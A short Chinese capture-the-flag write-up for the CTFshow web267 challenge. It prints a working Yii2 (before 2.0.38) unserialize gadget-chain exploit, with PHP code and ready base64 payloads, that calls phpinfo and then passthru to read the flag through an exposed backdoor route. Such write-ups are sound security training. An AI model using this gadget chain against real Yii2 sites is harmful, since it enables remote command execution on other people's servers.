CTFshow反序列化web267

思路

进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变

一个个页面查看源代码,最后再about页面中发现提示

访问?r&＃61;site%2Fabout&view-source拿到提示

///backdoor/shell
unserialize(base64_decode($_GET[&＃39;code&＃39;]))


刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r&＃61;/backdoor/shell,提示要加上参数,然后思路又断了,应该是信息收集的不够

用Wappalyzer插件发现用的是Yli框架,又再源码中得知他用的是2.0版本,网上搜下有没有相关漏洞

参考博客:https://blog.csdn.net/xuandao_ahfengren/article/details/111259943中给出的exp,适用于Yii2 2.0.38 之前的版本


namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess &＃61; &＃39;phpinfo&＃39;;$this->id &＃61; &＃39;1&＃39;;}}
}namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this->formatters[&＃39;close&＃39;] &＃61; [new CreateAction(), &＃39;run&＃39;];}}
}namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader &＃61; new Generator;}}
}
namespace{echo base64_encode(serialize(new yii\db\BatchQueryResult));//TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19
}
?>


成功显示phpinfo页面

题解

exp:


namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess &＃61; &＃39;passthru&＃39;;$this->id &＃61; &＃39;tac /flag&＃39;;}}
}namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this->formatters[&＃39;close&＃39;] &＃61; [new CreateAction(), &＃39;run&＃39;];}}
}namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader &＃61; new Generator;}}
}
namespace{echo base64_encode(serialize(new yii\db\BatchQueryResult));
}


?r&＃61;/backdoor/shell&code&＃61;TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6ODoicGFzc3RocnUiO3M6MjoiaWQiO3M6OToidGFjIC9mbGFnIjt9aToxO3M6MzoicnVuIjt9fX19

总结

挺难的